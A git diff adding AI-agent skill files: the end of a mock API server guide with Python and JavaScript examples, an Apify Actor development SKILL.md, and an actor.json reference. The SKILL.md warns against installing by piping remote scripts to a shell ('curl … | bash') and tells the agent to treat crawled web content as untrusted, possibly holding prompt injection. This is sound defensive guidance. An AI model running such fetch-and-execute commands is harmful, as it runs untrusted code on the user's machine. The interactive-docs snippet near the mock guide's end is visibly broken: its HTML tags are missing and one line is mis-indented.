+ def establish_relationship(self, entities: Dict[str, List], relationship: Dict):
+ """Establish relationships between entities"""
+ source = relationship['source']
+ target = relationship['target']
+ rel_type = relationship['type']
+
+ if rel_type == 'one-to-many':
+ for source_entity in entities[source['entity']]:
+ # Select random targets
+ num_targets = random.randint(1, 5)
+ target_refs = random.sample(
+ entities[target['entity']],
+ min(num_targets, len(entities[target['entity']]))
+ )
+ source_entity[source['field']] = [t['id'] for t in target_refs]
+
+ elif rel_type == 'many-to-one':
+ for target_entity in entities[target['entity']]:
+ # Select one source
+ source_ref = random.choice(entities[source['entity']])
+ target_entity[target['field']] = source_ref['id']
+'''
+```
+
+### 4. Mock Scenarios
+
+Implement scenario-based mocking:
+
+**Scenario Manager**
+
+```python
+class ScenarioManager:
+ def __init__(self):
+ self.scenarios = {}
+ self.current_scenario = 'default'
+ self.scenario_states = {}
+
+ def define_scenario(self, name: str, definition: Dict[str, Any]):
+ """Define a mock scenario"""
+ self.scenarios[name] = {
+ 'name': name,
+ 'description': definition.get('description', ''),
+ 'initial_state': definition.get('initial_state', {}),
+ 'stubs': definition.get('stubs', []),
+ 'sequences': definition.get('sequences', []),
+ 'conditions': definition.get('conditions', [])
+ }
+
+ def create_test_scenarios(self):
+ """Create common test scenarios"""
+ return {
+ 'happy_path': {
+ 'description': 'All operations succeed',
+ 'stubs': [
+ {
+ 'path': '/api/auth/login',
+ 'response': {
+ 'status': 200,
+ 'body': {
+ 'token': 'valid_token',
+ 'user': {'id': '123', 'name': 'Test User'}
+ }
+ }
+ },
+ {
+ 'path': '/api/users/{id}',
+ 'response': {
+ 'status': 200,
+ 'body': {
+ 'id': '{id}',
+ 'name': 'Test User',
+ 'email': 'test@example.com'
+ }
+ }
+ }
+ ]
+ },
+ 'error_scenario': {
+ 'description': 'Various error conditions',
+ 'sequences': [
+ {
+ 'name': 'rate_limiting',
+ 'steps': [
+ {'repeat': 5, 'response': {'status': 200}},
+ {'repeat': 10, 'response': {'status': 429, 'body': {'error': 'Rate limit exceeded'}}}
+ ]
+ }
+ ],
+ 'stubs': [
+ {
+ 'path': '/api/auth/login',
+ 'conditions': [
+ {
+ 'match': {'body': {'username': 'locked_user'}},
+ 'response': {'status': 423, 'body': {'error': 'Account locked'}}
+ }
+ ]
+ }
+ ]
+ },
+ 'degraded_performance': {
+ 'description': 'Slow responses and timeouts',
+ 'stubs': [
+ {
+ 'path': '/api/*',
+ 'delay': 5000, # 5 second delay
+ 'response': {'status': 200}
+ }
+ ]
+ }
+ }
+
+ def execute_scenario_sequence(self):
+ """Execute scenario sequences"""
+ return '''
+class SequenceExecutor:
+ def __init__(self):
+ self.sequence_states = {}
+
+ def get_sequence_response(self, sequence_name: str, request: Dict):
+ """Get response based on sequence state"""
+ if sequence_name not in self.sequence_states:
+ self.sequence_states[sequence_name] = {'step': 0, 'count': 0}
+
+ state = self.sequence_states[sequence_name]
+ sequence = self.get_sequence_definition(sequence_name)
+
+ # Get current step
+ current_step = sequence['steps'][state['step']]
+
+ # Check if we should advance to next step
+ state['count'] += 1
+ if state['count'] >= current_step.get('repeat', 1):
+ state['step'] = (state['step'] + 1) % len(sequence['steps'])
+ state['count'] = 0
+
+ return current_step['response']
+
+ def create_stateful_scenario(self):
+ """Create scenario with stateful behavior"""
+ return {
+ 'shopping_cart': {
+ 'initial_state': {
+ 'cart': {},
+ 'total': 0
+ },
+ 'stubs': [
+ {
+ 'method': 'POST',
+ 'path': '/api/cart/items',
+ 'handler': 'add_to_cart',
+ 'modifies_state': True
+ },
+ {
+ 'method': 'GET',
+ 'path': '/api/cart',
+ 'handler': 'get_cart',
+ 'uses_state': True
+ }
+ ],
+ 'handlers': {
+ 'add_to_cart': lambda state, request: {
+ 'state': {
+ **state,
+ 'cart': {
+ **state['cart'],
+ request['body']['product_id']: request['body']['quantity']
+ },
+ 'total': state['total'] + request['body']['price']
+ },
+ 'response': {
+ 'status': 201,
+ 'body': {'message': 'Item added to cart'}
+ }
+ },
+ 'get_cart': lambda state, request: {
+ 'response': {
+ 'status': 200,
+ 'body': {
+ 'items': state['cart'],
+ 'total': state['total']
+ }
+ }
+ }
+ }
+ }
+ }
+'''
+```
+
+### 5. Contract Testing
+
+Implement contract-based mocking:
+
+**Contract Testing Framework**
+
+```python
+class ContractMockServer:
+ def __init__(self):
+ self.contracts = {}
+ self.validators = self._init_validators()
+
+ def load_contract(self, contract_path: str):
+ """Load API contract (OpenAPI, AsyncAPI, etc.)"""
+ with open(contract_path, 'r') as f:
+ contract = yaml.safe_load(f)
+
+ # Parse contract
+ self.contracts[contract['info']['title']] = {
+ 'spec': contract,
+ 'endpoints': self._parse_endpoints(contract),
+ 'schemas': self._parse_schemas(contract)
+ }
+
+ def generate_mocks_from_contract(self, contract_name: str):
+ """Generate mocks from contract specification"""
+ contract = self.contracts[contract_name]
+ mocks = []
+
+ for path, methods in contract['endpoints'].items():
+ for method, spec in methods.items():
+ mock = self._create_mock_from_spec(path, method, spec)
+ mocks.append(mock)
+
+ return mocks
+
+ def _create_mock_from_spec(self, path: str, method: str, spec: Dict):
+ """Create mock from endpoint specification"""
+ mock = {
+ 'method': method.upper(),
+ 'path': self._convert_path_to_pattern(path),
+ 'responses': {}
+ }
+
+ # Generate responses for each status code
+ for status_code, response_spec in spec.get('responses', {}).items():
+ mock['responses'][status_code] = {
+ 'status': int(status_code),
+ 'headers': self._get_response_headers(response_spec),
+ 'body': self._generate_response_body(response_spec)
+ }
+
+ # Add request validation
+ if 'requestBody' in spec:
+ mock['request_validation'] = self._create_request_validator(spec['requestBody'])
+
+ return mock
+
+ def validate_against_contract(self):
+ """Validate mock responses against contract"""
+ return '''
+class ContractValidator:
+ def validate_response(self, contract_spec, actual_response):
+ """Validate response against contract"""
+ validation_results = {
+ 'valid': True,
+ 'errors': []
+ }
+
+ # Find response spec for status code
+ response_spec = contract_spec['responses'].get(
+ str(actual_response['status']),
+ contract_spec['responses'].get('default')
+ )
+
+ if not response_spec:
+ validation_results['errors'].append({
+ 'type': 'unexpected_status',
+ 'message': f"Status {actual_response['status']} not defined in contract"
+ })
+ validation_results['valid'] = False
+ return validation_results
+
+ # Validate headers
+ if 'headers' in response_spec:
+ header_errors = self.validate_headers(
+ response_spec['headers'],
+ actual_response['headers']
+ )
+ validation_results['errors'].extend(header_errors)
+
+ # Validate body schema
+ if 'content' in response_spec:
+ body_errors = self.validate_body(
+ response_spec['content'],
+ actual_response['body']
+ )
+ validation_results['errors'].extend(body_errors)
+
+ validation_results['valid'] = len(validation_results['errors']) == 0
+ return validation_results
+
+ def validate_body(self, content_spec, actual_body):
+ """Validate response body against schema"""
+ errors = []
+
+ # Get schema for content type
+ schema = content_spec.get('application/json', {}).get('schema')
+ if not schema:
+ return errors
+
+ # Validate against JSON schema
+ try:
+ validate(instance=actual_body, schema=schema)
+ except ValidationError as e:
+ errors.append({
+ 'type': 'schema_validation',
+ 'path': e.json_path,
+ 'message': e.message
+ })
+
+ return errors
+'''
+```
+
+### 6. Performance Testing
+
+Create performance testing mocks:
+
+**Performance Mock Server**
+
+```python
+class PerformanceMockServer:
+ def __init__(self):
+ self.performance_profiles = {}
+ self.metrics_collector = MetricsCollector()
+
+ def create_performance_profile(self, name: str, config: Dict):
+ """Create performance testing profile"""
+ self.performance_profiles[name] = {
+ 'latency': config.get('latency', {'min': 10, 'max': 100}),
+ 'throughput': config.get('throughput', 1000), # requests per second
+ 'error_rate': config.get('error_rate', 0.01), # 1% errors
+ 'response_size': config.get('response_size', {'min': 100, 'max': 10000})
+ }
+
+ async def simulate_performance(self, profile_name: str, request: Request):
+ """Simulate performance characteristics"""
+ profile = self.performance_profiles[profile_name]
+
+ # Simulate latency
+ latency = random.uniform(profile['latency']['min'], profile['latency']['max'])
+ await asyncio.sleep(latency / 1000)
+
+ # Simulate errors
+ if random.random() < profile['error_rate']:
+ return self._generate_error_response()
+
+ # Generate response with specified size
+ response_size = random.randint(
+ profile['response_size']['min'],
+ profile['response_size']['max']
+ )
+
+ response_data = self._generate_data_of_size(response_size)
+
+ # Track metrics
+ self.metrics_collector.record({
+ 'latency': latency,
+ 'response_size': response_size,
+ 'timestamp': datetime.now()
+ })
+
+ return response_data
+
+ def create_load_test_scenarios(self):
+ """Create load testing scenarios"""
+ return {
+ 'gradual_load': {
+ 'description': 'Gradually increase load',
+ 'stages': [
+ {'duration': 60, 'target_rps': 100},
+ {'duration': 120, 'target_rps': 500},
+ {'duration': 180, 'target_rps': 1000},
+ {'duration': 60, 'target_rps': 100}
+ ]
+ },
+ 'spike_test': {
+ 'description': 'Sudden spike in traffic',
+ 'stages': [
+ {'duration': 60, 'target_rps': 100},
+ {'duration': 10, 'target_rps': 5000},
+ {'duration': 60, 'target_rps': 100}
+ ]
+ },
+ 'stress_test': {
+ 'description': 'Find breaking point',
+ 'stages': [
+ {'duration': 60, 'target_rps': 100},
+ {'duration': 60, 'target_rps': 500},
+ {'duration': 60, 'target_rps': 1000},
+ {'duration': 60, 'target_rps': 2000},
+ {'duration': 60, 'target_rps': 5000},
+ {'duration': 60, 'target_rps': 10000}
+ ]
+ }
+ }
+
+ def implement_throttling(self):
+ """Implement request throttling"""
+ return '''
+class ThrottlingMiddleware:
+ def __init__(self, max_rps: int):
+ self.max_rps = max_rps
+ self.request_times = deque()
+
+ async def __call__(self, request: Request, call_next):
+ current_time = time.time()
+
+ # Remove old requests
+ while self.request_times and self.request_times[0] < current_time - 1:
+ self.request_times.popleft()
+
+ # Check if we're over limit
+ if len(self.request_times) >= self.max_rps:
+ return Response(
+ content=json.dumps({
+ 'error': 'Rate limit exceeded',
+ 'retry_after': 1
+ }),
+ status_code=429,
+ headers={'Retry-After': '1'}
+ )
+
+ # Record this request
+ self.request_times.append(current_time)
+
+ # Process request
+ response = await call_next(request)
+ return response
+'''
+```
+
+### 7. Mock Data Management
+
+Manage mock data effectively:
+
+**Mock Data Store**
+
+```python
+class MockDataStore:
+ def __init__(self):
+ self.collections = {}
+ self.indexes = {}
+
+ def create_collection(self, name: str, schema: Dict = None):
+ """Create a new data collection"""
+ self.collections[name] = {
+ 'data': {},
+ 'schema': schema,
+ 'counter': 0
+ }
+
+ # Create default index on 'id'
+ self.create_index(name, 'id')
+
+ def insert(self, collection: str, data: Dict):
+ """Insert data into collection"""
+ collection_data = self.collections[collection]
+
+ # Validate against schema if exists
+ if collection_data['schema']:
+ self._validate_data(data, collection_data['schema'])
+
+ # Generate ID if not provided
+ if 'id' not in data:
+ collection_data['counter'] += 1
+ data['id'] = str(collection_data['counter'])
+
+ # Store data
+ collection_data['data'][data['id']] = data
+
+ # Update indexes
+ self._update_indexes(collection, data)
+
+ return data['id']
+
+ def query(self, collection: str, filters: Dict = None):
+ """Query collection with filters"""
+ collection_data = self.collections[collection]['data']
+
+ if not filters:
+ return list(collection_data.values())
+
+ # Use indexes if available
+ if self._can_use_index(collection, filters):
+ return self._query_with_index(collection, filters)
+
+ # Full scan
+ results = []
+ for item in collection_data.values():
+ if self._matches_filters(item, filters):
+ results.append(item)
+
+ return results
+
+ def create_relationships(self):
+ """Define relationships between collections"""
+ return '''
+class RelationshipManager:
+ def __init__(self, data_store: MockDataStore):
+ self.store = data_store
+ self.relationships = {}
+
+ def define_relationship(self,
+ source_collection: str,
+ target_collection: str,
+ relationship_type: str,
+ foreign_key: str):
+ """Define relationship between collections"""
+ self.relationships[f"{source_collection}->{target_collection}"] = {
+ 'type': relationship_type,
+ 'source': source_collection,
+ 'target': target_collection,
+ 'foreign_key': foreign_key
+ }
+
+ def populate_related_data(self, entity: Dict, collection: str, depth: int = 1):
+ """Populate related data for entity"""
+ if depth <= 0:
+ return entity
+
+ # Find relationships for this collection
+ for rel_key, rel in self.relationships.items():
+ if rel['source'] == collection:
+ # Get related data
+ foreign_id = entity.get(rel['foreign_key'])
+ if foreign_id:
+ related = self.store.get(rel['target'], foreign_id)
+ if related:
+ # Recursively populate
+ related = self.populate_related_data(
+ related,
+ rel['target'],
+ depth - 1
+ )
+ entity[rel['target']] = related
+
+ return entity
+
+ def cascade_operations(self, operation: str, collection: str, entity_id: str):
+ """Handle cascade operations"""
+ if operation == 'delete':
+ # Find dependent relationships
+ for rel in self.relationships.values():
+ if rel['target'] == collection:
+ # Delete dependent entities
+ dependents = self.store.query(
+ rel['source'],
+ {rel['foreign_key']: entity_id}
+ )
+ for dep in dependents:
+ self.store.delete(rel['source'], dep['id'])
+'''
+```
+
+### 8. Testing Framework Integration
+
+Integrate with popular testing frameworks:
+
+**Testing Integration**
+
+```python
+class TestingFrameworkIntegration:
+ def create_jest_integration(self):
+ """Jest testing integration"""
+ return '''
+// jest.mock.config.js
+import { MockServer } from './mockServer';
+
+const mockServer = new MockServer();
+
+beforeAll(async () => {
+ await mockServer.start({ port: 3001 });
+
+ // Load mock definitions
+ await mockServer.loadMocks('./mocks/*.json');
+
+ // Set default scenario
+ await mockServer.setScenario('test');
+});
+
+afterAll(async () => {
+ await mockServer.stop();
+});
+
+beforeEach(async () => {
+ // Reset mock state
+ await mockServer.reset();
+});
+
+// Test helper functions
+export const setupMock = async (stub) => {
+ return await mockServer.addStub(stub);
+};
+
+export const verifyRequests = async (matcher) => {
+ const requests = await mockServer.getRequests(matcher);
+ return requests;
+};
+
+// Example test
+describe('User API', () => {
+ it('should fetch user details', async () => {
+ // Setup mock
+ await setupMock({
+ method: 'GET',
+ path: '/api/users/123',
+ response: {
+ status: 200,
+ body: { id: '123', name: 'Test User' }
+ }
+ });
+
+ // Make request
+ const response = await fetch('http://localhost:3001/api/users/123');
+ const user = await response.json();
+
+ // Verify
+ expect(user.name).toBe('Test User');
+
+ // Verify mock was called
+ const requests = await verifyRequests({ path: '/api/users/123' });
+ expect(requests).toHaveLength(1);
+ });
+});
+'''
+
+ def create_pytest_integration(self):
+ """Pytest integration"""
+ return '''
+# conftest.py
+import pytest
+from mock_server import MockServer
+import asyncio
+
+@pytest.fixture(scope="session")
+def event_loop():
+ loop = asyncio.get_event_loop_policy().new_event_loop()
+ yield loop
+ loop.close()
+
+@pytest.fixture(scope="session")
+async def mock_server(event_loop):
+ server = MockServer()
+ await server.start(port=3001)
+ yield server
+ await server.stop()
+
+@pytest.fixture(autouse=True)
+async def reset_mocks(mock_server):
+ await mock_server.reset()
+ yield
+ # Verify no unexpected calls
+ unmatched = await mock_server.get_unmatched_requests()
+ assert len(unmatched) == 0, f"Unmatched requests: {unmatched}"
+
+# Test utilities
+class MockBuilder:
+ def __init__(self, mock_server):
+ self.server = mock_server
+ self.stubs = []
+
+ def when(self, method, path):
+ self.current_stub = {
+ 'method': method,
+ 'path': path
+ }
+ return self
+
+ def with_body(self, body):
+ self.current_stub['body'] = body
+ return self
+
+ def then_return(self, status, body=None, headers=None):
+ self.current_stub['response'] = {
+ 'status': status,
+ 'body': body,
+ 'headers': headers or {}
+ }
+ self.stubs.append(self.current_stub)
+ return self
+
+ async def setup(self):
+ for stub in self.stubs:
+ await self.server.add_stub(stub)
+
+# Example test
+@pytest.mark.asyncio
+async def test_user_creation(mock_server):
+ # Setup mocks
+ mock = MockBuilder(mock_server)
+ mock.when('POST', '/api/users') \
+ .with_body({'name': 'New User'}) \
+ .then_return(201, {'id': '456', 'name': 'New User'})
+
+ await mock.setup()
+
+ # Test code here
+ response = await create_user({'name': 'New User'})
+ assert response['id'] == '456'
+'''
+```
+
+### 9. Mock Server Deployment
+
+Deploy mock servers:
+
+**Deployment Configuration**
+
+```yaml
+# docker-compose.yml for mock services
+version: "3.8"
+
+services:
+ mock-api:
+ build:
+ context: .
+ dockerfile: Dockerfile.mock
+ ports:
+ - "3001:3001"
+ environment:
+ - MOCK_SCENARIO=production
+ - MOCK_DATA_PATH=/data/mocks
+ volumes:
+ - ./mocks:/data/mocks
+ - ./scenarios:/data/scenarios
+ healthcheck:
+ test: ["CMD", "curl", "-f", "http://localhost:3001/health"]
+ interval: 30s
+ timeout: 10s
+ retries: 3
+
+ mock-admin:
+ build:
+ context: .
+ dockerfile: Dockerfile.admin
+ ports:
+ - "3002:3002"
+ environment:
+ - MOCK_SERVER_URL=http://mock-api:3001
+ depends_on:
+ - mock-api
+
+
+# Kubernetes deployment
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+ name: mock-server
+spec:
+ replicas: 2
+ selector:
+ matchLabels:
+ app: mock-server
+ template:
+ metadata:
+ labels:
+ app: mock-server
+ spec:
+ containers:
+ - name: mock-server
+ image: mock-server:latest
+ ports:
+ - containerPort: 3001
+ env:
+ - name: MOCK_SCENARIO
+ valueFrom:
+ configMapKeyRef:
+ name: mock-config
+ key: scenario
+ volumeMounts:
+ - name: mock-definitions
+ mountPath: /data/mocks
+ volumes:
+ - name: mock-definitions
+ configMap:
+ name: mock-definitions
+```
+
+### 10. Mock Documentation
+
+Generate mock API documentation:
+
+**Documentation Generator**
+
+````python
+class MockDocumentationGenerator:
+ def generate_documentation(self, mock_server):
+ """Generate comprehensive mock documentation"""
+ return f"""
+# Mock API Documentation
+
+## Overview
+{self._generate_overview(mock_server)}
+
+## Available Endpoints
+{self._generate_endpoints_doc(mock_server)}
+
+## Scenarios
+{self._generate_scenarios_doc(mock_server)}
+
+## Data Models
+{self._generate_models_doc(mock_server)}
+
+## Usage Examples
+{self._generate_examples(mock_server)}
+
+## Configuration
+{self._generate_config_doc(mock_server)}
+"""
+
+ def _generate_endpoints_doc(self, mock_server):
+ """Generate endpoint documentation"""
+ doc = ""
+ for endpoint in mock_server.get_endpoints():
+ doc += f"""
+### {endpoint['method']} {endpoint['path']}
+
+**Description**: {endpoint.get('description', 'No description')}
+
+**Request**:
+```json
+{json.dumps(endpoint.get('request_example', {}), indent=2)}
+````
+
+**Response**:
+
+```json
+{json.dumps(endpoint.get('response_example', {}), indent=2)}
+```
+
+**Scenarios**:
+{self.\_format_endpoint_scenarios(endpoint)}
+"""
+return doc
+
+ def create_interactive_docs(self):
+ """Create interactive API documentation"""
+ return '''
+
+
+
+
+ Mock API Interactive Documentation
+
+
+
+
+
+
+
+
+ Scenario:
+
+ Default
+ Error Conditions
+ Slow Responses
+
+
+
+
+'''
+```
+
+## Output Format
+
+1. **Mock Server Setup**: Complete mock server implementation
+2. **Stubbing Configuration**: Flexible request/response stubbing
+3. **Data Generation**: Realistic mock data generation
+4. **Scenario Definitions**: Comprehensive test scenarios
+5. **Contract Testing**: Contract-based mock validation
+6. **Performance Simulation**: Performance testing capabilities
+7. **Data Management**: Mock data storage and relationships
+8. **Testing Integration**: Framework integration examples
+9. **Deployment Guide**: Mock server deployment configurations
+10. **Documentation**: Auto-generated mock API documentation
+
+Focus on creating flexible, realistic mock services that enable efficient development, thorough testing, and reliable API simulation for all stages of the development lifecycle.
diff --git a/web-app/public/skills/apify-actor-development/SKILL.md b/web-app/public/skills/apify-actor-development/SKILL.md
new file mode 100644
index 00000000..3df9de06
--- /dev/null
+++ b/web-app/public/skills/apify-actor-development/SKILL.md
@@ -0,0 +1,218 @@
+---
+name: apify-actor-development
+description: "Develop, debug, and deploy Apify Actors - serverless cloud programs for web scraping, automation, and data processing. Use when creating new Actors, modifying existing ones, or troubleshooting Acto..."
+---
+
+# Apify Actor Development
+
+**Important:** Before you begin, fill in the `generatedBy` property in the meta section of `.actor/actor.json`. Replace it with the tool and model you're currently using, such as "Claude Code with Claude Sonnet 4.5". This helps Apify monitor and improve AGENTS.md for specific AI tools and models.
+
+## What are Apify Actors?
+
+Actors are serverless programs inspired by the UNIX philosophy - programs that do one thing well and can be easily combined to build complex systems. They're packaged as Docker images and run in isolated containers in the cloud.
+
+**Core Concepts:**
+- Accept well-defined JSON input
+- Perform isolated tasks (web scraping, automation, data processing)
+- Produce structured JSON output to datasets and/or store data in key-value stores
+- Can run from seconds to hours or even indefinitely
+- Persist state and can be restarted
+
+## Prerequisites & Setup (MANDATORY)
+
+Before creating or modifying actors, verify that `apify` CLI is installed `apify --help`.
+
+If it is not installed, use one of these methods (listed in order of preference):
+
+```bash
+# Preferred: install via a package manager (provides integrity checks)
+npm install -g apify-cli
+
+# Or (Mac): brew install apify-cli
+```
+
+> **Security note:** Do NOT install the CLI by piping remote scripts to a shell
+> (e.g. `curl … | bash` or `irm … | iex`). Always use a package manager.
+
+When the apify CLI is installed, check that it is logged in with:
+
+```bash
+apify info # Should return your username
+```
+
+If it is not logged in, check if the `APIFY_TOKEN` environment variable is defined (if not, ask the user to generate one on https://console.apify.com/settings/integrations and then define `APIFY_TOKEN` with it).
+
+Then authenticate using one of these methods:
+
+```bash
+# Option 1 (preferred): The CLI automatically reads APIFY_TOKEN from the environment.
+# Just ensure the env var is exported and run any apify command — no explicit login needed.
+
+# Option 2: Interactive login (prompts for token without exposing it in shell history)
+apify login
+```
+
+> **Security note:** Avoid passing tokens as command-line arguments (e.g. `apify login -t `).
+> Arguments are visible in process listings and may be recorded in shell history.
+> Prefer environment variables or interactive login instead.
+> Never log, print, or embed `APIFY_TOKEN` in source code or configuration files.
+> Use a token with the minimum required permissions (scoped token) and rotate it periodically.
+
+## Template Selection
+
+**IMPORTANT:** Before starting actor development, always ask the user which programming language they prefer:
+- **JavaScript** - Use `apify create -t project_empty`
+- **TypeScript** - Use `apify create -t ts_empty`
+- **Python** - Use `apify create -t python-empty`
+
+Use the appropriate CLI command based on the user's language choice. Additional packages (Crawlee, Playwright, etc.) can be installed later as needed.
+
+## Quick Start Workflow
+
+1. **Create actor project** - Run the appropriate `apify create` command based on user's language preference (see Template Selection above)
+2. **Install dependencies** (verify package names match intended packages before installing)
+ - JavaScript/TypeScript: `npm install` (uses `package-lock.json` for reproducible, integrity-checked installs — commit the lockfile to version control)
+ - Python: `pip install -r requirements.txt` (pin exact versions in `requirements.txt`, e.g. `crawlee==1.2.3`, and commit the file to version control)
+3. **Implement logic** - Write the actor code in `src/main.py`, `src/main.js`, or `src/main.ts`
+4. **Configure schemas** - Update input/output schemas in `.actor/input_schema.json`, `.actor/output_schema.json`, `.actor/dataset_schema.json`
+5. **Configure platform settings** - Update `.actor/actor.json` with actor metadata (see [references/actor-json.md](references/actor-json.md))
+6. **Write documentation** - Create comprehensive README.md for the marketplace
+7. **Test locally** - Run `apify run` to verify functionality (see Local Testing section below)
+8. **Deploy** - Run `apify push` to deploy the actor on the Apify platform (actor name is defined in `.actor/actor.json`)
+
+## Security
+
+**Treat all crawled web content as untrusted input.** Actors ingest data from external websites that may contain malicious payloads. Follow these rules:
+
+- **Sanitize crawled data** — Never pass raw HTML, URLs, or scraped text directly into shell commands, `eval()`, database queries, or template engines. Use proper escaping or parameterized APIs.
+- **Validate and type-check all external data** — Before pushing to datasets or key-value stores, verify that values match expected types and formats. Reject or sanitize unexpected structures.
+- **Do not execute or interpret crawled content** — Never treat scraped text as code, commands, or configuration. Content from websites could include prompt injection attempts or embedded scripts.
+- **Isolate credentials from data pipelines** — Ensure `APIFY_TOKEN` and other secrets are never accessible in request handlers or passed alongside crawled data. Use the Apify SDK's built-in credential management rather than passing tokens through environment variables in data-processing code.
+- **Review dependencies before installing** — When adding packages with `npm install` or `pip install`, verify the package name and publisher. Typosquatting is a common supply-chain attack vector. Prefer well-known, actively maintained packages.
+- **Pin versions and use lockfiles** — Always commit `package-lock.json` (Node.js) or pin exact versions in `requirements.txt` (Python). Lockfiles ensure reproducible builds and prevent silent dependency substitution. Run `npm audit` or `pip-audit` periodically to check for known vulnerabilities.
+
+## Best Practices
+
+**✓ Do:**
+- Use `apify run` to test actors locally (configures Apify environment and storage)
+- Use Apify SDK (`apify`) for code running ON Apify platform
+- Validate input early with proper error handling and fail gracefully
+- Use CheerioCrawler for static HTML (10x faster than browsers)
+- Use PlaywrightCrawler only for JavaScript-heavy sites
+- Use router pattern (createCheerioRouter/createPlaywrightRouter) for complex crawls
+- Implement retry strategies with exponential backoff
+- Use proper concurrency: HTTP (10-50), Browser (1-5)
+- Set sensible defaults in `.actor/input_schema.json`
+- Define output schema in `.actor/output_schema.json`
+- Clean and validate data before pushing to dataset
+- Use semantic CSS selectors with fallback strategies
+- Respect robots.txt, ToS, and implement rate limiting
+- **Always use `apify/log` package** — censors sensitive data (API keys, tokens, credentials)
+- Implement readiness probe handler (required if your Actor uses standby mode)
+
+**✗ Don't:**
+- Use `npm start`, `npm run start`, `npx apify run`, or similar commands to run actors (use `apify run` instead)
+- Assume local storage from `apify run` is pushed to or visible in the Apify Console — it is local-only; deploy with `apify push` and run on the platform to see results in the Console
+- Rely on `Dataset.getInfo()` for final counts on Cloud
+- Use browser crawlers when HTTP/Cheerio works
+- Hard code values that should be in input schema or environment variables
+- Skip input validation or error handling
+- Overload servers - use appropriate concurrency and delays
+- Scrape prohibited content or ignore Terms of Service
+- Store personal/sensitive data unless explicitly permitted
+- Use deprecated options like `requestHandlerTimeoutMillis` on CheerioCrawler (v3.x)
+- Use `additionalHttpHeaders` - use `preNavigationHooks` instead
+- Pass raw crawled content into shell commands, `eval()`, or code-generation functions
+- Use `console.log()` or `print()` instead of the Apify logger — these bypass credential censoring
+- Disable standby mode without explicit permission
+
+## Logging
+
+See [references/logging.md](references/logging.md) for complete logging documentation including available log levels and best practices for JavaScript/TypeScript and Python.
+
+Check `usesStandbyMode` in `.actor/actor.json` - only implement if set to `true`.
+
+## Commands
+
+```bash
+apify run # Run Actor locally
+apify login # Authenticate account
+apify push # Deploy to Apify platform (uses name from .actor/actor.json)
+apify help # List all commands
+```
+
+**IMPORTANT:** Always use `apify run` to test actors locally. Do not use `npm run start`, `npm start`, `yarn start`, or other package manager commands - these will not properly configure the Apify environment and storage.
+
+## Local Testing
+
+When testing an actor locally with `apify run`, provide input data by creating a JSON file at:
+
+```
+storage/key_value_stores/default/INPUT.json
+```
+
+This file should contain the input parameters defined in your `.actor/input_schema.json`. The actor will read this input when running locally, mirroring how it receives input on the Apify platform.
+
+**IMPORTANT - Local storage is NOT synced to the Apify Console:**
+- Running `apify run` stores all data (datasets, key-value stores, request queues) **only on your local filesystem** in the `storage/` directory.
+- This data is **never** automatically uploaded or pushed to the Apify platform. It exists only on your machine.
+- To verify results on the Apify Console, you must deploy the Actor with `apify push` and then run it on the platform.
+- Do **not** rely on checking the Apify Console to verify results from local runs — instead, inspect the local `storage/` directory or check the Actor's log output.
+
+## Standby Mode
+
+See [references/standby-mode.md](references/standby-mode.md) for complete standby mode documentation including readiness probe implementation for JavaScript/TypeScript and Python.
+
+## Project Structure
+
+```
+.actor/
+├── actor.json # Actor config: name, version, env vars, runtime
+├── input_schema.json # Input validation & Console form definition
+└── output_schema.json # Output storage and display templates
+src/
+└── main.js/ts/py # Actor entry point
+storage/ # Local-only storage (NOT synced to Apify Console)
+├── datasets/ # Output items (JSON objects)
+├── key_value_stores/ # Files, config, INPUT
+└── request_queues/ # Pending crawl requests
+Dockerfile # Container image definition
+```
+
+## Actor Configuration
+
+See [references/actor-json.md](references/actor-json.md) for complete actor.json structure and configuration options.
+
+## Input Schema
+
+See [references/input-schema.md](references/input-schema.md) for input schema structure and examples.
+
+## Output Schema
+
+See [references/output-schema.md](references/output-schema.md) for output schema structure, examples, and template variables.
+
+## Dataset Schema
+
+See [references/dataset-schema.md](references/dataset-schema.md) for dataset schema structure, configuration, and display properties.
+
+## Key-Value Store Schema
+
+See [references/key-value-store-schema.md](references/key-value-store-schema.md) for key-value store schema structure, collections, and configuration.
+
+
+## Apify MCP Tools
+
+If MCP server is configured, use these tools for documentation:
+
+- `search-apify-docs` - Search documentation
+- `fetch-apify-docs` - Get full doc pages
+
+Otherwise, the MCP Server url: `https://mcp.apify.com/?tools=docs`.
+
+## Resources
+
+- [docs.apify.com/llms.txt](https://docs.apify.com/llms.txt) - Apify quick reference documentation
+- [docs.apify.com/llms-full.txt](https://docs.apify.com/llms-full.txt) - Apify complete documentation
+- [https://crawlee.dev/llms.txt](https://crawlee.dev/llms.txt) - Crawlee quick reference documentation
+- [https://crawlee.dev/llms-full.txt](https://crawlee.dev/llms-full.txt) - Crawlee complete documentation
+- [whitepaper.actor](https://raw.githubusercontent.com/apify/actor-whitepaper/refs/heads/master/README.md) - Complete Actor specification
diff --git a/web-app/public/skills/apify-actor-development/references/actor-json.md b/web-app/public/skills/apify-actor-development/references/actor-json.md
new file mode 100644
index 00000000..f698139f
--- /dev/null
+++ b/web-app/public/skills/apify-actor-development/references/actor-json.md
@@ -0,0 +1,66 @@
+# Actor Configuration (actor.json)
+
+The `.actor/actor.json` file contains the Actor's configuration including metadata, schema references, and platform settings.
+
+## Structure
+
+```json
+{
+ "actorSpecification": 1,
+ "name": "project-name",
+ "title": "Project Title",
+ "description": "Actor description",
+ "version": "0.0",
+ "meta": {
+ "templateId": "template-id",
+ "generatedBy": ""
+ },
+ "input": "./input_schema.json",
+ "output": "./output_schema.json",
+ "storages": {
+ "dataset": "./dataset_schema.json"
+ },
+ "dockerfile": "../Dockerfile"
+}
+```
+
+## Example
+
+```json
+{
+ "actorSpecification": 1,
+ "name": "project-cheerio-crawler-javascript",
+ "title": "Project Cheerio Crawler Javascript",
+ "description": "Crawlee and Cheerio project in javascript.",
+ "version": "0.0",
+ "meta": {
+ "templateId": "js-crawlee-cheerio",
+ "generatedBy": "Claude Code with Claude Sonnet 4.5"
+ },
+ "input": "./input_schema.json",
+ "output": "./output_schema.json",
+ "storages": {
+ "dataset": "./dataset_schema.json"
+ },
+ "dockerfile": "../Dockerfile"
+}
+```
+
+## Properties
+
+- `actorSpecification` (integer, required) - Version of actor specification (currently 1)
+- `name` (string, required) - Actor identifier (lowercase, hyphens allowed)
+- `title` (string, required) - Human-readable title displayed in UI
+- `description` (string, optional) - Actor description for marketplace
+- `version` (string, required) - Semantic version number
+- `meta` (object, optional) - Metadata about actor generation
+ - `templateId` (string) - ID of template used to create the actor
